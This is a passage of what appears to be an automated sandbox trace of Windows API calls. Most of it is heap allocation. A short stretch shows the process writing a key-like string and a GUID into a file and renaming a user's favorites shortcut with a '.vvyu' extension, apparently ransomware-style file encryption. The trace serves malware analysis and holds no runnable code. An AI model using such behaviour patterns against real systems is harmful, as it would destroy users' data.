Flags=0x0, Size=0x204) returned 0x2adf8e0 [0194.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63b0 | out: hHeap=0x2c0000) returned 1 [0194.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0194.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63e0 | out: hHeap=0x2c0000) returned 1 [0194.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af3f88 [0194.571] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0194.571] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0194.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0194.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0194.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6350 | out: hHeap=0x2c0000) returned 1 [0194.572] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af41a0 [0194.572] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0194.573] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0194.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0194.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.573] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0194.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0194.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0194.574] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0194.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af41a0 | out: hHeap=0x2c0000) returned 1 [0194.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0194.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0194.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6380 | out: hHeap=0x2c0000) returned 1 [0194.575] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0194.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae63c8 | out: hHeap=0x2c0000) returned 1 [0194.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0194.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6368 | out: hHeap=0x2c0000) returned 1 [0194.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6338 | out: hHeap=0x2c0000) returned 1 [0194.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0194.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0194.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0194.576] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6320 | out: hHeap=0x2c0000) returned 1 [0194.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae24a0 | out: hHeap=0x2c0000) returned 1 [0194.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf8e0 | out: hHeap=0x2c0000) returned 1 [0194.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0194.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40210 | out: hHeap=0x2c0000) returned 1 [0194.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0194.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0194.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0194.578] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0194.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0194.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0194.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0194.580] WriteFile (in: hFile=0x584, lpBuffer=0x3b48b8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b48b8*, lpNumberOfBytesWritten=0x2f9fb14*=0x80, lpOverlapped=0x0) returned 1 [0194.580] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b48b8 | out: hHeap=0x2c0000) returned 1 [0194.580] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.580] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0194.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2adf6e8 [0194.581] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2adf6e8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.581] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af3f88 [0194.581] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adf6e8 | out: hHeap=0x2c0000) returned 1 [0194.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.582] WriteFile (in: hFile=0x584, lpBuffer=0x2af3f88*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af3f88*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.582] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.582] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.582] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.582] CloseHandle (hObject=0x584) returned 1 [0194.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0194.583] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x880) returned 0x2af3f88 [0194.584] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0194.584] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msnbc news.url.vvyu")) returned 1 [0194.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0194.585] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0194.585] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfe08 | out: hHeap=0x2c0000) returned 1 [0194.589] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0194.589] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0194.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0194.590] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0194.607] PeekMessageW (in: lpMsg=0x2f9ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9ff08) returned 0 [0194.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0194.608] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0194.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.608] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.609] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.610] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.610] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.611] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.612] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.612] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0194.613] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.615] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.616] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.616] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.617] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.618] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.618] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.619] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.619] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.621] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.621] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.622] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.622] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.623] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.623] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.624] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.624] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.625] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.625] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.626] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.627] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0194.628] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.629] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.629] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0194.630] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0194.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.632] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.632] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0194.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0194.633] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.633] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.634] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0194.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0194.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0194.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0194.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0194.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: 